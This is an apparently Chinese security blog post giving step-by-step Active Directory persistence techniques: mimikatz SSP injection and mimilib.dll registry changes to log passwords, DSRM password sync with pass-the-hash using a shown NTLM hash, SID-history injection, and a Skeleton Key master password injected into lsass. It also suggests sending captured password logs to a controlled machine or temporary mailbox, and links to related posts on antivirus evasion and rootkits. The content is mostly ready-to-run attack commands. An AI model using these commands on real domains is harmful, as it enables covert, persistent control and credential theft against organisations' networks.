EthanDoctor

内网对抗-权限维持篇&内网AD域&SSP注入&DSRM还原后门&SID历史后门&Skeleton钥匙

Ethan医生3个月前系统安全127

 权限维持-内网域-基于验证DLL加载-SSP

 权限维持-内网域-基于机制账号启用-DSRM

 权限维持-内网域-基于用户属性修改-SID-history

 权限维持-内网域-基于登录进程劫持-Skeleton-Key

参考资料:

https://forum.butian.net/share/524

 

#内网域-权限维持-基于验证DLL加载-SSP

方法一:但如果域控制器重启,被注入内存的伪造的SSP将会丢失。

privilege::debug

misc::memssp

C:\Windows\System32\mimilsa.log 记录登录的账号密码

方法二:使用此方法即使系统重启,也不会影响到持久化的效果。

1、mimilib.dll 传到目标域控的c:\windows\system32\目录下

2、修改注册表,重启生效

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

c:\windows\system32\kiwissp.log 记录账号密码文件

技术总结:

攻防实战中,靶机很难会重启,攻击者重启的话风险过大,

因此可以在靶机上把两个方法相互结合起来使用效果比较好,

尝试利用把生成的日志密码文件发送到内网被控机器或者临时邮箱。

 

#内网域-权限维持-基于机制账号启用-DSRM

1.获取dsrm及krbtgt的NTLM hash  (krbtgt是默认的域系统用户)

privilege::debug

lsadump::lsa /patch /name:krbtgt

token::elevate

lsadump::sam

2.dsrm&krbtgt&NTLM hash同步

NTDSUTIL:打开ntdsutil

set DSRM password:修改DSRM的密码

sync from domain account 域用户名字:使DSRM的密码和指定域用户的密码同步

q(第1次):退出DSRM密码设置模式

q(第2次):退出ntdsutil

3.修改dsrm登录方式

New-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD

4.利用PTH传递攻击

privilege::debug

sekurlsa::pth /domain:owa2010cn-god /user:administrator /ntlm:b097d7ed97495408e1537f706c357fc5

dir \\owa2010cn-god\c$

技术总结:

利用系统自带机制模式DSRM,修改DSRM默认登录方式和属性,通过其同步krgtgt进行PTH攻击,实现持续化控制,但适用于系统=>windows server2008。每个域控制器都有本地管理员账号和密码(与域管理员账号和密码不同)。DSRM账号可以作为一个域控制器的本地管理员用户,通过网络连接域控制器,进而控制域控制器。

 

#内网域-权限维持-基于用户属性修改-SID history (有时后会是IP访问 可以先尝试使用用户名如果不行再使用IP访问)

1、获取某用户SID属性:

Import-Module ActiveDirectory

Get-ADUser webadmin -Properties sidhistory

2、给予某用户administrator属性:

privilege::debug

sid::patch

sid::add /sam:webadmin /new:administrator

3、测评给与前后的DC访问权限:

dir \\192.168.3.21\c$

技术总结:

把域控管理员的SID加入到 其他某个恶意的域账户的SID History中,然后,这个恶意的(我们自己创建的)域账户就可以域管理员权限访问域控了,不修改一直存在。

 

#内网域-权限维持-基于登录进程劫持-Skeleton Key

1、连接DC后,DC注入lsass进程

mimikatz:

privilege::debug

misc::skeleton

2、重新测试域内某个用户与DC通讯(万能密码mimikatz)

net use \\owa2010cn-god\ipc$ "mimikatz" /user:god\administrator

dir \\owa2010cn-god\c$

技术总结:

因为Skeleton Key技术是被注入到lsass.exe进程的,

所以它只存在内存中,如域控重启,万能密码将失效。


返回列表

上一篇:内网对抗-横向移动篇&Linux到Linux&SSH协议&密匙对文件登录&历史命令&Jenkins攻击

下一篇:内网对抗-权限维持篇&内网AD域&Kerberos点&黄金票据&白银票据&钻石票据&蓝宝石票据

相关文章

免杀对抗-C2远控篇&C&C++&DLL注入&过内存核晶&镂空新增&白加黑链&签名程序劫持

免杀对抗-C2远控篇&C&C++&DLL注入&过内存核晶&镂空新增&白加黑链&签名程序劫持

#C2远控-ShellCode-认知&环境1.创建工程时关闭SDL检查2.属性->C/C++->代码生成->运行库->多线程 (/MT)如果是debug则设置成MTD3...

内网对抗-权限维持篇&内网AD域&Kerberos点&黄金票据&白银票据&钻石票据&蓝宝石票据

参考资料:https://forum.butian.net/share/524https://mp.weixin.qq.com/s/rt2IpxGV-nhAp-3Cqpo1eA 1、黄金票据...

Windows系统权限提升篇&计算机用户&进程注入&令牌窃取&服务启动&远程管理

应用场景:1、常规某个机器被钓鱼后门攻击后,我们需要做更高权限操作或权限维持等。2、内网域中某个机器被钓鱼后门攻击后,我们需要对后续内网域做安全测试。 主要当前技术入口点:-当前权限由钓鱼攻...

Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选

Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选

Web到Win-系统提权-人工操作如果提权中无法执行命令的话,可以尝试上传cmd.exe到可读写目录再调用优点:解决实时更新不集成的EXP缺点:操作繁琐,需要各种复现调试解决工具或插件无法实时更新,又...

内网对抗-横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用

#委派安全知识点委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。 域委派分类:1、...

内网对抗-权限维持篇&AD域&单机版&C2远控&Rookit后门&RustDesk&GotoHTTP&直连

➢ 权限维持-内网域&单机版-GotoHttp➢ 权限维持-内网域&单机版-RustDesk➢ 权限维持-内网域&单机版-r77Rookit1、C...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号